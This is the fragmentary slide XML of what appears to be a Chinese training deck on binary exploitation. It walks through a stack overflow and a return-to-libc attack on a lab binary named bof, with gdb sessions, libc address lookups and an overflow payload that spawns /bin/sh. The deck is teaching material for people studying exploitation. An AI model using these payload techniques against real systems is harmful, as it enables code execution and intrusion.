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672EFCA-FB07-4488-97D7-7D83822E2600}">
  <a:tblStyle styleId="{8672EFCA-FB07-4488-97D7-7D83822E26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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide213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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 16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Shape 1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Shape 1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Shape 1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Shape 16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Shape 16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Shape 16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Shape 17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Shape 17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Shape 1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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 17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Shape 18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Shape 1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Shape 1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Shape 1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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 19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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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hape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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Shape 20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hape 20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Shape 20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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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6" name="Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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8" name="Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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5" name="Shape 2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Shape 2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Shape 2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Shape 2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7" name="Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 25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Shape 2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Shape 2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Shape 2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Shape 25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4" name="Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 2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Shape 26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Shape 2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Shape 27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9" name="Shape 2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Shape 27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4" name="Shape 27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4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Shape 27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6" name="Shape 2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6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Shape 28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8" name="Shape 28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6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Shape 28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8" name="Shape 28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0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Shape 28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2" name="Shape 28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Shape 29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3" name="Shape 29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Shape 29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2" name="Shape 29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Shape 30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2" name="Shape 30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0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Shape 30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2" name="Shape 30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0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Shape 30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2" name="Shape 30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Shape 3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0" name="Shape 3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5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Shape 3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7" name="Shape 3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5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Shape 3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7" name="Shape 3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3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Shape 3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5" name="Shape 3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8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Shape 3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Shape 3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4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Shape 3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Shape 3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0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Shape 3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2" name="Shape 3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8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Shape 3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0" name="Shape 3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8" name="Shape 3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9" name="Shape 3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0" name="Shape 3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6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Shape 3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8" name="Shape 3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5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Shape 3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7" name="Shape 3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4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Shape 3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Shape 3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0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Shape 3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2" name="Shape 3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6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Shape 3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8" name="Shape 3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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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hape 1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Shape 1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Shape 1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Shape 1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it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None/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FF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59800" y="2834125"/>
            <a:ext cx="8572500" cy="4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66125" y="300399"/>
            <a:ext cx="2757125" cy="6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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259800" y="1017725"/>
            <a:ext cx="8572500" cy="4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6225" y="560550"/>
            <a:ext cx="1535575" cy="3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un.yang@chaitin.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:wenlei.zhu@chaitin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0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3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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hellman/libformatstr" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf" TargetMode="Externa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3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github.com/longld/peda" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BinaryAnalysisPlatform/qira" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/angr/angr" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://triton.quarkslab.com/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二进制漏洞挖掘与利用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kun.yang@chaitin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>,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wenlei.zhu@chaitin.com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Compiling: From C to Assembly</a:t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904600" y="1904250"/>
            <a:ext cx="2684100" cy="1581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ebp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ebp, esp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mov eax, [ebp+12]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add eax, [ebp+8]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pop ebp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ret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375075" y="2037750"/>
            <a:ext cx="26841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sum(int x, int y)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t = x + y;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0" name="Shape 130"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="129" idx="3"/>
            <a:endCxn id="128" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059175" y="2694750"/>
            <a:ext cx="84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to Libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Shape 1444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="18705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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Shape 1445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="21777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sp>
        <p:nvSpPr>
          <p:cNvPr id="1446" name="Shape 1446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="24849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447" name="Shape 1447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="27921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448" name="Shape 1448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="3099350"/>
            <a:ext cx="1571400" cy="122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449" name="Shape 1449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="15633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50" name="Shape 1450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253700" y="2638550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451" name="Shape 1451"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="2792150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Shape 1452"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7103550" y="1581900"/>
            <a:ext cx="15900" cy="273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3" name="Shape 1453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="2707075"/>
            <a:ext cx="887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1454" name="Shape 1454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="1520550"/>
            <a:ext cx="1872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system("/bin/sh")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exit(0)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5" name="Shape 1455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="2864450"/>
            <a:ext cx="2162100" cy="18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ebp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ebp, esp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...(execute command)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6" name="Shape 1456"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="216189" y="2387098"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1457" name="Shape 1457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58" name="Shape 1458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59" name="Shape 1459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="1322525"/>
            <a:ext cx="2162100" cy="137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stack overflow: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ebp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ebp, esp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to Libc</a:t>
            </a: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5329875" y="18705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"/bin/sh"</a:t>
            </a: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5329875" y="21777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sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Shape 1467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="24849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468" name="Shape 1468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="27921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5329875" y="3099350"/>
            <a:ext cx="1571400" cy="122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470" name="Shape 1470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="15633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71" name="Shape 1471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253700" y="2333750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</a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1472" name="Shape 1472"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="2487350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3" name="Shape 1473"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7103550" y="1581900"/>
            <a:ext cx="15900" cy="273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4" name="Shape 1474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="2707075"/>
            <a:ext cx="887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1475" name="Shape 1475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="1520550"/>
            <a:ext cx="1872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system("/bin/sh")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exit(0)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6" name="Shape 1476"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="2864450"/>
            <a:ext cx="2162100" cy="18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ebp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ebp, esp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...(execute command)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7" name="Shape 1477"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="216189" y="3191159"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1478" name="Shape 1478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79" name="Shape 1479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80" name="Shape 1480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="1322525"/>
            <a:ext cx="2162100" cy="137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stack overflow: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ebp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ebp, esp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ret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to Libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1486" name="Shape 1486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="18705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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Shape 1487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="21777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sp>
        <p:nvSpPr>
          <p:cNvPr id="1488" name="Shape 1488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="24849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489" name="Shape 1489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="27921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490" name="Shape 1490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="3099350"/>
            <a:ext cx="1571400" cy="122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491" name="Shape 1491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="15633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92" name="Shape 1492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253700" y="2333750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493" name="Shape 1493"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="2487350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4" name="Shape 1494"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7103550" y="1581900"/>
            <a:ext cx="15900" cy="273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5" name="Shape 1495"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="2707075"/>
            <a:ext cx="887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1496" name="Shape 1496"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="1520550"/>
            <a:ext cx="1872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system("/bin/sh")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exit(0)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7" name="Shape 1497"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="2864450"/>
            <a:ext cx="2162100" cy="18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push ebp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mov ebp, esp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...(execute command)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8" name="Shape 1498"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="216189" y="3930401"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1499" name="Shape 1499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00" name="Shape 1500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1" name="Shape 1501"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="1322525"/>
            <a:ext cx="2162100" cy="137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stack overflow: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ebp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ebp, esp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Shape 1502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764100" y="1872350"/>
            <a:ext cx="1126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666666"/>
                </a:highlight>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1503" name="Shape 1503"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="2025350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Shape 15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to Libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1509" name="Shape 1509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="18705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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1510" name="Shape 1510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="21777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sp>
        <p:nvSpPr>
          <p:cNvPr id="1511" name="Shape 1511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="24849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512" name="Shape 1512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="27921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513" name="Shape 1513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="3099350"/>
            <a:ext cx="1571400" cy="122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514" name="Shape 1514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="15633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15" name="Shape 1515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253700" y="2028950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</a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1516" name="Shape 1516"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="2182550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7" name="Shape 1517"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7103550" y="1581900"/>
            <a:ext cx="15900" cy="273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8" name="Shape 1518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="2707075"/>
            <a:ext cx="887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1519" name="Shape 1519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="1520550"/>
            <a:ext cx="1872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system("/bin/sh")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exit(0)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20" name="Shape 1520"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="216189" y="1644401"/>
            <a:ext cx="1126200" cy="274200"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="Shape 1521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22" name="Shape 1522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23" name="Shape 1523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="1322525"/>
            <a:ext cx="2162100" cy="137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ebp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ebp, esp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Shape 1524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342400" y="2864450"/>
            <a:ext cx="2162100" cy="18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ebp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ebp, esp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...(execute command)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ret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5" name="Shape 1525"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926650" y="1720550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6" name="Shape 1526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764100" y="1567550"/>
            <a:ext cx="1126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666666"/>
                </a:highlight>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight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addresses for system() &amp; exit()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1532" name="Shape 15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gdb -q --args ./bof $(python -c 'print "A" * 140 + "BBBB"')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Reading symbols from ./bof...(no debugging symbols found)...done.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p system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No symbol table is loaded.  Use the "file" command.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r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Starting program: /home/user/Challenges/bof/bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB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argv[1]:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB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Program received signal SIGSEGV, Segmentation fault.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0x42424242 in ?? ()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p system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$1 = {&lt;text variable, no debug info&gt;}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0xf7e3fd80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&lt;system&gt;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p exit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$2 = {&lt;text variable, no debug info&gt;}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0xf7e339b0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&lt;exit&gt;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address for "/bin/sh" in glibc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1538" name="Shape 15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Shape 1539"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3854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info proc mappings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process 54708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540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Mapped address spaces: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Start Addr   End Addr       Size     Offset objfile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 0x8048000  0x8049000     0x1000        0x0 /home/user/Challenges/bof/bof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 0x8049000  0x804a000     0x1000        0x0 /home/user/Challenges/bof/bof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 0x804a000  0x806b000    0x21000        0x0 [heap]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0xf7e05000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0xf7fb4000   0x1af000        0x0 /lib/i386-linux-gnu/libc-2.23.so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0xf7fb4000 0xf7fb5000     0x1000   0x1af000 /lib/i386-linux-gnu/libc-2.23.so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0xf7fb5000 0xf7fb7000     0x2000   0x1af000 /lib/i386-linux-gnu/libc-2.23.so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0xf7fb7000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0xf7fb8000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0x1000   0x1b1000 /lib/i386-linux-gnu/libc-2.23.so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0xfffdd000 0xffffe000    0x21000        0x0 [stack]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find /b 0xf7e05000, 0xf7fb8000, '/', 'b', 'i', 'n', '/', 's', 'h', 0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0xf7f60a3f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1 pattern found.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x/s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0xf7f60a3f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0xf7f60a3f:     "/bin/sh"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“/bin/sh” An alternative method</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1545" name="Shape 1545"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body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user@ubuntu:~/Challenges/bof$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ldd bof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linux-gate.so.1 =&gt;  (0xf7ffd000)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libc.so.6 =&gt;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/lib/i386-linux-gnu/libc.so.6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(0xf7e2a000)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/lib/ld-linux.so.2 (0x56555000)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user@ubuntu:~/Challenges/bof$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readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system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1457: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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0003ad80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55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0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user@ubuntu:~/Challenges/bof$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readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit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141: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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0002e9b0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31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0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user@ubuntu:~/Challenges/bof$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strings -tx /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh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15ba3f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/bin/sh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user@ubuntu:~/Challenges/bof$ gdb -q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p/x 0xf7e05000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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0x0003ad80</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EA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$1 =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0xf7e3fd80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p/x 0xf7e05000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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0x0002e9b0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="A4C2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$2 =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0xf7e339b0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p/x 0xf7e05000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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0x15ba3f</a:t>
            </a:r>
            <a:endParaRPr b="1"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$3 =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0xf7f60a3f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6" name="Shape 1546"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493475" y="4472075"/>
            <a:ext cx="4506300" cy="4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WTF? There is a "\n" in the address of "/bin/sh"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Fail!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1552" name="Shape 1552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3695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gdb -q --args ./bof $(python -c 'print "A" * 140 + "\x80\xfd\xe3\xf7" + "\xb0\x39\xe3\xf7" +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"\x3f\x0a\xf6\xf7"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+ "\0\0\0\0"')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Reading symbols from ./bof...(no debugging symbols found)...done.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 *0x8048527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Breakpoint 1 at 0x8048527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r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argv[1]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��9?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Breakpoint 1, 0x08048527 in main ()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x/20x $esp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0xffffd51c:     0xf7e3fd80      0xf7e339b0     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0xffff003f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0xffffd5c4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0xffffd52c:     0x00000000      0x00000000      0x00000000      0xf7fb7000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p system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$1 = {&lt;text variable, no debug info&gt;} 0xf7e3fd80 &lt;system&gt;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p exit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$2 = {&lt;text variable, no debug info&gt;} 0xf7e339b0 &lt;exit&gt;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Shape 15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"sh\0" saves life</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1558" name="Shape 1558"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3228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info proc mappings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process 54945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Mapped address spaces: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Start Addr   End Addr       Size     Offset objfile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 0x8048000  0x8049000     0x1000        0x0 /home/user/Challenges/bof/bof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 0x8049000  0x804a000     0x1000        0x0 /home/user/Challenges/bof/bof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 0x804a000  0x806b000    0x21000        0x0 [heap]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find /b 0x8048000, 0x8049000, 's', 'h', 0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0x8048d79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1 pattern found.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x/s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0x8048d79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0x8048d79:      "sh"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x/s 0x8048d72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0x8048d72:     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".gnu.hash"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return to libc exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1564" name="Shape 1564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1988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./bof $(python -c 'print </a:t>
            </a:r>
            <a:r>
